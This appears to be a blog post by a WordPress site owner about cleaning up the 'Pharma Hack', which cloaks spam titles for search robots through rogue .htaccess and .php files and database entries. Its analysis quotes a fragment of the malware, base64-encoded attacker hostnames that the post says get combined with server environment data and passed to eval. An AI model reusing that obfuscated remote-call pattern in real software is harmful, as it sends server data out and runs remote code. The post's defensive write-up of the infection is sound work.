You May Already Be A Victim

A few weeks ago a client wrote to tell me that they thought their site had been hacked. It looked fine when you pulled it up in the browser, but when you searched for it on Google you got a warning that site may have been compromised, and instead of the real title you saw something “Adipose 25MG.”

With a little research I learned that it was in fact a well-known but little-understood exploit called the “Pharma Hack.” It’s devious in that it checks the user agent header and if it’s a search robot it serves one set of results — the hacked result; but if it’s a human user it renders the normal, clean code.

Try it yourself if you’re a WordPress user. Go to Google and use this search term:
site:www.myurl.com

“myurl” being of course your site’s URL. I cleaned out said client’s site twice, and checking again today it came up a third time. Curious, I checked my own Google results:

What the hack did was replace my title tag, and the top-level headline, with Buy VIAGRA Online… I am not amused at this point.

A couple of tools you’ll want

First of all, sign up for Google’s Webmaster Tools. It’s an excellent way to find out first-hand if you’ve been compromised. Register your sites and check in periodically. There’s obviously lots of other goodies there too.

There are a couple of fine tutorials on how to fix this. You’re going to need file system access, including access to hidden files, on your server. If you can search for files, all the better. If you can get shell access and grep, better still. Otherwise you’ve got some tedious directory-by-directory searching ahead of you. Don’t skimp on this or you’ll simply get hacked again in a few days or weeks. You’ll also need access to the database, either through the command line or through something like phpmyadmin. Most hosting services provide the latter.

Sucuri’s is the most complete. Chris Pearson’s is also good, and quite readable.

The thing is, the malicious files can be anywhere. I found one in my Akismet plug-in directory, the irony of which does not escape me. I found one in another plug-in directory on my client’s. Even after uninstalling and re-installing all the plugins, they kept coming back.

Not especially the sections on database entries. That’s what allows it to keep popping up again and again. Basically, there are long base64-encoded strings put into field values backwards.

After installing and running the WP-MalWatch plugin I found lots more. (note to the developer: a module that looks for database entries would be cool). All through my uploads directory, and especially in the 2006 and 2007 directories where I’m least likely to look (it’s a recent infection after all, it couldn’t have been way back then!) were a whole bunch of .htaccess and .php files. None of them should be in the uploads directory, period. The .htaccess files consisted of a few lines of 404 redirect code; this is perhaps what triggers the whole thing. When a user looks for an image or other upload that isn’t there, the 404 redirects the user to a “custom” error handler — one of the bogus .php files — and runs it.

Insidious. The .php files are randomly named, 42983.php or 23001.php, and there were dozens of them usually coming in pairs. Once I teased one out and started to look at it, this is what I found: A lot of environmental variables were strung together into a string. Then there’s this:
base64_decode("aHR0cDovLw==") . base64_decode("d3d3My5yc3NuZXdzLndz")

When you base64_decode that you get “http://www3.rssnews.ws”. This is strung together with the long string it made out of the environment, and put into an eval block:

http://www3.rssnews.ws/?$yourServerInformationHere

There’s a second base64-encoded string that works out to “http://www3.xmldata.info”. These are the guys wearing the black hats.

Now with the plugin installed at least I feel like I’ve got a leg up on the matter; I can run a scan daily, or just check my dashboard, and see what’s going on. If you’re running WordPress, run don’t walk to Google and make sure you haven’t been hit.

Summing Up

Get Google Webmaster Tools. Check your site on Google to make sure your page’s title is what it should be. Clean out the file system of alien files. Clean out the database entries that shouldn’t be there. Install and run the security plugin.

What’s bad here is that nobody knows how this happens, what the vulnerability is. Until then, vigilance is all you’ve got.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>